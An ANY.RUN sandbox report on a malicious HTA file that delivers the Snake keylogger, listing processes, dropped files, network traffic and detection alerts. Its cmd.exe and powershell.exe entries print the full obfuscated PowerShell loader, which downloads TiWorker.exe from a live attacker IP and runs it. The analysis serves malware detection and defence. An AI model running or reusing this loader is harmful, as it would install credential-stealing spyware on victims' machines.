File name:

bestskillforsupportcharacterbasedonme.hta

Full analysis: https://app.any.run/tasks/52aafcc5-838c-454b-8dba-6a544d8580ee
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Malware Trends Tracker     >>>
Analysis date: May 15, 2025, 18:46:34
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
susp-powershell
evasion
snake
keylogger
stealer
ims-api
generic
Indicators:
MIME: application/javascript
File info: JavaScript source, ASCII text, with very long lines (28516), with no line terminators
MD5:

60EF09FF15A1A343DF3A717BFF22F204

SHA1:

865375857D054CD546D0AA4B4A252F57E8EB437E

SHA256:

3D259354FAEF2F025402B6886DB906DF41B4BBB4B93223E970DD29D17ECA845E

SSDEEP:

192:/N8xi9pv8xjpAU04Hfg4nYeZDx8xG8xA+p898x+:Si9pYjpAd4HYeZDOhA+p8q+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Accesses environment variables (SCRIPT)

      • mshta.exe (PID: 5056)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 4408)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5124)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5124)

    • Starts Visual C# compiler

      • powershell.exe (PID: 5124)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 5124)

    • SNAKEKEYLOGGER has been detected (SURICATA)

      • RegSvcs.exe (PID: 728)

    • Actions looks like stealing of personal data

      • RegSvcs.exe (PID: 728)

    • Steals credentials from Web Browsers

      • RegSvcs.exe (PID: 728)

  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 5056)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 5056)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 4408)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 4408)

    • Executes script without checking the security policy

      • powershell.exe (PID: 5124)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4408)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 4408)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5124)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 4488)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 5124)

    • Uses .NET C# to load dll

      • powershell.exe (PID: 5124)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 4488)
      • powershell.exe (PID: 5124)

    • Connects to the server without a host name

      • powershell.exe (PID: 5124)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 5124)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 5124)

    • Checks for external IP

      • svchost.exe (PID: 2196)
      • RegSvcs.exe (PID: 728)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • RegSvcs.exe (PID: 728)

    • The process verifies whether the antivirus software is installed

      • RegSvcs.exe (PID: 728)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 5056)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5124)

    • Checks supported languages

      • csc.exe (PID: 4488)
      • TiWorker.exe (PID: 6728)
      • RegSvcs.exe (PID: 728)
      • cvtres.exe (PID: 920)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 4488)
      • RegSvcs.exe (PID: 728)

    • Create files in a temporary directory

      • csc.exe (PID: 4488)
      • cvtres.exe (PID: 920)
      • TiWorker.exe (PID: 6728)

    • Checks proxy server information

      • powershell.exe (PID: 5124)
      • slui.exe (PID: 664)
      • RegSvcs.exe (PID: 728)

    • Reads mouse settings

      • TiWorker.exe (PID: 6728)

    • The executable file from the user directory is run by the Powershell process

      • TiWorker.exe (PID: 6728)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 4408)

    • Reads the computer name

      • RegSvcs.exe (PID: 728)

    • Reads the software policy settings

      • RegSvcs.exe (PID: 728)
      • slui.exe (PID: 664)

    • Disables trace logs

      • RegSvcs.exe (PID: 728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
10
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start mshta.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe csc.exe cvtres.exe no specs tiworker.exe no specs #SNAKEKEYLOGGER regsvcs.exe svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
664C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
728"C:\Users\admin\AppData\Local\Temp\TiWorker.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
TiWorker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Services Installation Utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
920C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE1D6.tmp" "c:\Users\admin\AppData\Local\Temp\CSC829C0008CF0E44E9A815C193DBC6CED5.TMP"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4408"C:\WINDOWS\system32\cmd.exe" "/c pOwerSHElL.Exe -eX ByPASS -nOp -W 1 -c DEvICECredenTIAlDePloyMENT.eXe ; IEX($(IEX('[systeM.TeXT.ENCODINg]'+[cHaR]58+[chAR]58+'UtF8.gEtstring([SystEM.cONveRt]'+[cHAr]58+[ChAr]0x3a+'FRomBAse64StriNG('+[cHaR]34+'JFlsTkRRVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJkZWZpTmlUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtb24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKc3FJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKaGVQTnksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGl0TkprdSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpaeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU29OYm9UTlljZU0pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInFWTW4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1Fc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJ5R1NPaExzZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbE5EUVc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc1Ljg4LjI3LzQ1Ni9UaVdvcmtlci5leGUiLCIkRW5WOlRFTVBcVGlXb3JrZXIuZXhlIiwwLDApO3NUYXJULXNsZWVwKDMpO0lOdk9rZS1JdGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOlRFTVBcVGlXb3JrZXIuZXhlIg=='+[chAR]34+'))')))"C:\Windows\SysWOW64\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
4488"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tbi4lc2t.cmdline"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
5056"C:\Windows\SysWOW64\mshta.exe" C:\Users\admin\Desktop\bestskillforsupportcharacterbasedonme.hta {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}C:\Windows\SysWOW64\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
5124pOwerSHElL.Exe -eX ByPASS -nOp -W 1 -c DEvICECredenTIAlDePloyMENT.eXe ; IEX($(IEX('[systeM.TeXT.ENCODINg]'+[cHaR]58+[chAR]58+'UtF8.gEtstring([SystEM.cONveRt]'+[cHAr]58+[ChAr]0x3a+'FRomBAse64StriNG('+[cHaR]34+'JFlsTkRRVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJkZWZpTmlUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtb24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKc3FJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKaGVQTnksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGl0TkprdSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpaeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU29OYm9UTlljZU0pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInFWTW4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1Fc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJ5R1NPaExzZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbE5EUVc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc1Ljg4LjI3LzQ1Ni9UaVdvcmtlci5leGUiLCIkRW5WOlRFTVBcVGlXb3JrZXIuZXhlIiwwLDApO3NUYXJULXNsZWVwKDMpO0lOdk9rZS1JdGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOlRFTVBcVGlXb3JrZXIuZXhlIg=='+[chAR]34+'))')))"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
5720\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6728"C:\Users\admin\AppData\Local\Temp\TiWorker.exe" C:\Users\admin\AppData\Local\Temp\TiWorker.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\psapi.dll
Total events
16 380
Read events
16 360
Write events
20
Delete events
0

Modification events

(PID) Process:(5056) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5056) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5056) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(5124) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5124) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5124) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(728) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(728) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(728) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(728) RegSvcs.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
Operation:writeName:FileTracingMask
Value:
Executable files
3
Suspicious files
5
Text files
7
Unknown types
0

Dropped files

PID
Process
Filename
Type
5124powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gadsqsaj.tb3.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5124powershell.exeC:\Users\admin\AppData\Local\Temp\tbi4lc2t.0.cstext
MD5:A3210CB4B4AAAA1348EF1C8A2F4AB4CB
SHA256:5E8F9D524113AE77D99189437E0DDAB14CEBC37B96A8E56DF44A2467F82EC4F5
5124powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wiy0v0ox.2fm.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5124powershell.exeC:\Users\admin\AppData\Local\Temp\tbi4lc2t.cmdlinetext
MD5:54E0F674C244E506A517A818A3D0B132
SHA256:BE649EB64B29E0BEB06D10AA27908952E1AB2A628B03421291C14D5D9C4F0393
4488csc.exeC:\Users\admin\AppData\Local\Temp\tbi4lc2t.dllexecutable
MD5:D883F66BFF3272A3669CAB4928616467
SHA256:B60132D0D2AC46F90B2C77B651888B88AC50F263AAF122A61F430263C4FF7503
4488csc.exeC:\Users\admin\AppData\Local\Temp\CSC829C0008CF0E44E9A815C193DBC6CED5.TMPbinary
MD5:B3ACCB1E5B1422E04CD213788141A08C
SHA256:4DED0C1142938E19097E84A04AB8A2D95045765737A1D262E0CE598ABA943FF2
5124powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_metklvco.13x.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
920cvtres.exeC:\Users\admin\AppData\Local\Temp\RESE1D6.tmpbinary
MD5:D1875499E3B463EFAF1A56847F8368FF
SHA256:426C111E99498E773ABDF24B424F07C115674F4BF45E75409DDBF5C85E803F63
5124powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\TiWorker[1].exeexecutable
MD5:23D4C5197FCCA0073FF665171B6CEB45
SHA256:8894CFA66DB7FCC688EAAEE3758877D52FDCEA6F47204DAFB55052410F62DED3
5124powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:D47549AFC88D4AACE230C9D9C9A59083
SHA256:FB9CB0AB949C5AD462C224DCFA57373BC89F3FBC0221FE1A3DB28B5891796D53
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
31
TCP/UDP connections
44
DNS requests
16
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
POST
200
40.126.31.67:443
https://login.live.com/RST2.srf
unknown
xml
1.24 Kb
whitelisted
POST
400
20.190.159.68:443
https://login.live.com/ppsecure/deviceaddcredential.srf
unknown
text
203 b
whitelisted
POST
400
40.126.31.67:443
https://login.live.com/ppsecure/deviceaddcredential.srf
unknown
text
203 b
whitelisted
POST
400
20.190.159.71:443
https://login.live.com/ppsecure/deviceaddcredential.srf
unknown
text
203 b
whitelisted
POST
400
20.190.159.129:443
https://login.live.com/ppsecure/deviceaddcredential.srf
unknown
text
203 b
whitelisted
5124
powershell.exe
GET
200
107.175.88.27:80
http://107.175.88.27/456/TiWorker.exe
unknown
malicious
728
RegSvcs.exe
GET
200
193.122.130.0:80
http://checkip.dyndns.org/
unknown
whitelisted
GET
200
104.21.32.1:443
https://reallyfreegeoip.org/xml/
unknown
text
350 b
malicious
728
RegSvcs.exe
GET
502
193.122.130.0:80
http://checkip.dyndns.org/
unknown
whitelisted
GET
304
4.245.163.56:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
unknown
20.190.159.128:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
20.190.159.128:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
5124
powershell.exe
107.175.88.27:80
AS-COLOCROSSING
US
malicious
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
728
RegSvcs.exe
193.122.130.0:80
checkip.dyndns.org
ORACLE-BMC-31898
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 20.73.194.208
whitelisted
google.com
  • 142.250.186.78
whitelisted
client.wns.windows.com
  • 172.211.123.249
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.159.128
  • 40.126.31.73
  • 20.190.159.23
  • 20.190.159.71
  • 40.126.31.131
  • 40.126.31.129
  • 40.126.31.71
  • 20.190.159.75
whitelisted
checkip.dyndns.org
  • 193.122.130.0
  • 132.226.8.169
  • 132.226.247.73
  • 158.101.44.242
  • 193.122.6.168
whitelisted
reallyfreegeoip.org
  • 104.21.96.1
  • 104.21.48.1
  • 104.21.32.1
  • 104.21.16.1
  • 104.21.112.1
  • 104.21.80.1
  • 104.21.64.1
malicious
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
crl.microsoft.com
  • 2.16.164.120
  • 2.16.164.49
whitelisted
www.microsoft.com
  • 23.219.150.101
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
5124
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
5124
powershell.exe
A Network Trojan was detected
ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
5124
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
5124
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
5124
powershell.exe
A Network Trojan was detected
ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
2196
svchost.exe
Device Retrieving External IP Address Detected
ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org)
728
RegSvcs.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup - checkip.dyndns.org
728
RegSvcs.exe
Device Retrieving External IP Address Detected
ET INFO 404/Snake/Matiex Keylogger Style External IP Check
2196
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
2196
svchost.exe
Misc activity
ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
bestskillforsupportcharacterbasedonme.hta